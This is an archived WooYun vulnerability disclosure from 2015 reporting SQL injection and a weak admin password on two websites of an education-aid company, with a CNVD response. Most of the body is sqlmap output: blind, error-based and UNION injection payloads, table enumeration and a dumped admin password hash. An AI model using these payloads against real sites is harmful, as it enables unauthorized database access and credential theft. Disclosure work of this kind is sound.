网开助学通两个官网分别一个SQL注入漏洞+弱口令

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0135495

漏洞标题：网开助学通两个官网分别一个SQL注入漏洞+弱口令

漏洞作者：岛云首席鉴黄师

提交时间：2015-08-22 21:31

修复时间：2015-10-08 18:54

公开时间：2015-10-08 18:54

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-08-22：细节已通知厂商并且等待厂商处理中
2015-08-24： cncert国家互联网应急中心暂未能联系到相关单位，细节仅向通报机构公开
2015-09-03：细节向核心白帽子及相关领域专家公开
2015-09-13：细节向普通白帽子公开
2015-09-23：细节向实习白帽子公开
2015-10-08：细节向公众公开

简要描述：

为啥两个官网……我也不知道,难道是cc和cn域名很像，保护版权么……

详细说明：

第一个官网的

http://**.**.**.**/index.php?m=News&a=detail
&id=46<code>
第二个官网的<code>http://**.**.**.**/index.php?m=News&a=detail
&id=46<code>
两个注入点差不多，除了数据库用户名，从表名到字段还有后台帐号密码都一模一样！顺便吐槽一下，后台口令都是123，弱口令，你这是要闹哪样？
第一个官网
<code>Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: m=News&a=detail&id=46 AND 6342=6342
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: m=News&a=detail&id=46 AND (SELECT * FROM (SELECT(SLEEP(5)))VTUb)
    Type: UNION query
    Title: Generic UNION query (NULL) - 17 columns
    Payload: m=News&a=detail&id=-8723 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7178717871,0x616b66574c6570554354,0x71706a6b71),NULL,NULL-- 
---
back-end DBMS: MySQL 5.0.12
Database: eoindex
[33 tables]
+---------------------------------------+
| eo_access                             |
| eo_account                            |
| eo_admin                              |
| eo_admin_log                          |
| eo_article                            |
| eo_auth                               |
| eo_auth_honest                        |
| eo_category                           |
| eo_custom                             |
| eo_download                           |
| eo_focus                              |
| eo_group                              |
| eo_help                               |
| eo_industry                           |
| eo_league                             |
| eo_login_log                          |
| eo_memo                               |
| eo_msg_log                            |
| eo_msg_tpl                            |
| eo_new_category                       |
| eo_news                               |
| eo_node                               |
| eo_note                               |
| eo_often_login                        |
| eo_online                             |
| eo_pay                                |
| eo_pay_type                           |
| eo_pic                                |
| eo_position                           |
| eo_reg_log                            |
| eo_role                               |
| eo_setting                            |
| eo_sys_config                         |
+---------------------------------------+
Database: information_schema
[40 tables]
+---------------------------------------+
| CHARACTER_SETS                        |
| COLLATIONS                            |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS                               |
| COLUMN_PRIVILEGES                     |
| ENGINES                               |
| EVENTS                                |
| FILES                                 |
| GLOBAL_STATUS                         |
| GLOBAL_VARIABLES                      |
| INNODB_BUFFER_PAGE                    |
| INNODB_BUFFER_PAGE_LRU                |
| INNODB_BUFFER_POOL_STATS              |
| INNODB_CMP                            |
| INNODB_CMPMEM                         |
| INNODB_CMPMEM_RESET                   |
| INNODB_CMP_RESET                      |
| INNODB_LOCKS                          |
| INNODB_LOCK_WAITS                     |
| INNODB_TRX                            |
| KEY_COLUMN_USAGE                      |
| PARAMETERS                            |
| PARTITIONS                            |
| PLUGINS                               |
| PROCESSLIST                           |
| PROFILING                             |
| REFERENTIAL_CONSTRAINTS               |
| ROUTINES                              |
| SCHEMATA                              |
| SCHEMA_PRIVILEGES                     |
| SESSION_STATUS                        |
| SESSION_VARIABLES                     |
| STATISTICS                            |
| TABLES                                |
| TABLESPACES                           |
| TABLE_CONSTRAINTS                     |
| TABLE_PRIVILEGES                      |
| TRIGGERS                              |
| USER_PRIVILEGES                       |
| VIEWS                                 |
+---------------------------------------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: m=News&a=detail&id=46 AND 6342=6342
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: m=News&a=detail&id=46 AND (SELECT * FROM (SELECT(SLEEP(5)))VTUb)
    Type: UNION query
    Title: Generic UNION query (NULL) - 17 columns
    Payload: m=News&a=detail&id=-8723 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7178717871,0x616b66574c6570554354,0x71706a6b71),NULL,NULL-- 
---
back-end DBMS: MySQL 5.0.12
Database: eoindex
Table: eo_admin
[7 columns]
+-----------+---------------------+
| Column    | Type                |
+-----------+---------------------+
| add_time  | int(10)             |
| id        | int(10)             |
| last_time | int(10)             |
| password  | varchar(100)        |
| role_id   | int(10)             |
| status    | tinyint(1) unsigned |
| user_name | varchar(50)         |
+-----------+---------------------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: m=News&a=detail&id=46 AND 6342=6342
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: m=News&a=detail&id=46 AND (SELECT * FROM (SELECT(SLEEP(5)))VTUb)
    Type: UNION query
    Title: Generic UNION query (NULL) - 17 columns
    Payload: m=News&a=detail&id=-8723 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7178717871,0x616b66574c6570554354,0x71706a6b71),NULL,NULL-- 
---
back-end DBMS: MySQL 5.0.12
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: m=News&a=detail&id=46 AND 6342=6342
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: m=News&a=detail&id=46 AND (SELECT * FROM (SELECT(SLEEP(5)))VTUb)
    Type: UNION query
    Title: Generic UNION query (NULL) - 17 columns
    Payload: m=News&a=detail&id=-8723 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7178717871,0x616b66574c6570554354,0x71706a6b71),NULL,NULL-- 
---
back-end DBMS: MySQL 5.0.12
Database: eoindex
Table: eo_admin
[1 entry]
+-----------+----------------------------------+
| user_name | password                         |
+-----------+----------------------------------+
| admin     | 202cb962ac59075b964b07152d234b70 |
+-----------+----------------------------------+

第二个官网

back-end DBMS: MySQL 5.0
current user:    'zxt_index@localhost'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: m=News&a=detail&id=-5705 OR 7639=7639#
    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: m=News&a=detail&id=46 OR (SELECT 7777 FROM(SELECT COUNT(*),CONCAT(0x71766b7171,(SELECT (ELT(7777=7777,1))),0x71787a7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: m=News&a=detail&id=46 AND (SELECT * FROM (SELECT(SLEEP(5)))vFZa)
    Type: UNION query
    Title: Generic UNION query (NULL) - 17 columns
    Payload: m=News&a=detail&id=46 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x71766b7171,0x6466747544736e6e7563,0x71787a7a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
---
back-end DBMS: MySQL 5.0
Database: zxt_index
[33 tables]
+-----------------+
| eo_access       |
| eo_account      |
| eo_admin        |
| eo_admin_log    |
| eo_article      |
| eo_auth         |
| eo_auth_honest  |
| eo_category     |
| eo_custom       |
| eo_download     |
| eo_focus        |
| eo_group        |
| eo_help         |
| eo_industry     |
| eo_league       |
| eo_login_log    |
| eo_memo         |
| eo_msg_log      |
| eo_msg_tpl      |
| eo_new_category |
| eo_news         |
| eo_node         |
| eo_note         |
| eo_often_login  |
| eo_online       |
| eo_pay          |
| eo_pay_type     |
| eo_pic          |
| eo_position     |
| eo_reg_log      |
| eo_role         |
| eo_setting      |
| eo_sys_config   |
+-----------------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: m=News&a=detail&id=-5705 OR 7639=7639#
    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: m=News&a=detail&id=46 OR (SELECT 7777 FROM(SELECT COUNT(*),CONCAT(0x71766b7171,(SELECT (ELT(7777=7777,1))),0x71787a7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: m=News&a=detail&id=46 AND (SELECT * FROM (SELECT(SLEEP(5)))vFZa)
    Type: UNION query
    Title: Generic UNION query (NULL) - 17 columns
    Payload: m=News&a=detail&id=46 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x71766b7171,0x6466747544736e6e7563,0x71787a7a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
---
back-end DBMS: MySQL 5.0
Database: zxt_index
Table: eo_custom
[8 columns]
+---------------+---------------+
| Column        | Type          |
+---------------+---------------+
| contact_phone | varchar(100)  |
| ctime         | int(11)       |
| email         | varchar(100)  |
| id            | mediumint(8)  |
| im            | int(8)        |
| info          | varchar(1000) |
| status        | smallint(1)   |
| type          | smallint(1)   |
+---------------+---------------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: m=News&a=detail&id=-5705 OR 7639=7639#
    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: m=News&a=detail&id=46 OR (SELECT 7777 FROM(SELECT COUNT(*),CONCAT(0x71766b7171,(SELECT (ELT(7777=7777,1))),0x71787a7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: m=News&a=detail&id=46 AND (SELECT * FROM (SELECT(SLEEP(5)))vFZa)
    Type: UNION query
    Title: Generic UNION query (NULL) - 17 columns
    Payload: m=News&a=detail&id=46 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x71766b7171,0x6466747544736e6e7563,0x71787a7a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
---
back-end DBMS: MySQL 5.0
Database: zxt_index
Table: eo_admin
[7 columns]
+-----------+---------------------+
| Column    | Type                |
+-----------+---------------------+
| add_time  | int(10)             |
| id        | int(10)             |
| last_time | int(10)             |
| password  | varchar(100)        |
| role_id   | int(10)             |
| status    | tinyint(1) unsigned |
| user_name | varchar(50)         |
+-----------+---------------------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: m=News&a=detail&id=-5705 OR 7639=7639#
    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: m=News&a=detail&id=46 OR (SELECT 7777 FROM(SELECT COUNT(*),CONCAT(0x71766b7171,(SELECT (ELT(7777=7777,1))),0x71787a7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: m=News&a=detail&id=46 AND (SELECT * FROM (SELECT(SLEEP(5)))vFZa)
    Type: UNION query
    Title: Generic UNION query (NULL) - 17 columns
    Payload: m=News&a=detail&id=46 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x71766b7171,0x6466747544736e6e7563,0x71787a7a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
---
back-end DBMS: MySQL 5.0
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: m=News&a=detail&id=-5705 OR 7639=7639#
    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: m=News&a=detail&id=46 OR (SELECT 7777 FROM(SELECT COUNT(*),CONCAT(0x71766b7171,(SELECT (ELT(7777=7777,1))),0x71787a7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: m=News&a=detail&id=46 AND (SELECT * FROM (SELECT(SLEEP(5)))vFZa)
    Type: UNION query
    Title: Generic UNION query (NULL) - 17 columns
    Payload: m=News&a=detail&id=46 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x71766b7171,0x6466747544736e6e7563,0x71787a7a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
---
back-end DBMS: MySQL 5.0
Database: zxt_index
Table: eo_admin
[1 entry]
+-----------+----------------------------------+
| user_name | password                         |
+-----------+----------------------------------+
| admin     | 202cb962ac59075b964b07152d234b70 |
+-----------+----------------------------------+

漏洞证明：

如上，漏洞打包给的，求多点rank,谢谢！

修复方案：

1.过滤
2.不要使用弱口令

版权声明：转载请注明来源岛云首席鉴黄师@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：9

确认时间：2015-08-24 18:53

厂商回复：

CNVD确认所述情况，已由CNVD通过网站管理方公开联系渠道向其邮件通报，由其后续提供解决方案并协调相关用户单位处置。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0135495

漏洞标题：网开助学通两个官网分别一个SQL注入漏洞+弱口令

相关厂商：网开助学通

漏洞作者：岛云首席鉴黄师

提交时间：2015-08-22 21:31

修复时间：2015-10-08 18:54

公开时间：2015-10-08 18:54

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源岛云首席鉴黄师@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0135495

漏洞标题：网开助学通两个官网分别一个SQL注入漏洞+弱口令

相关厂商：网开助学通

漏洞作者： 岛云首席鉴黄师

提交时间：2015-08-22 21:31

修复时间：2015-10-08 18:54

公开时间：2015-10-08 18:54

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0135495"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 岛云首席鉴黄师@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：岛云首席鉴黄师

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源岛云首席鉴黄师@乌云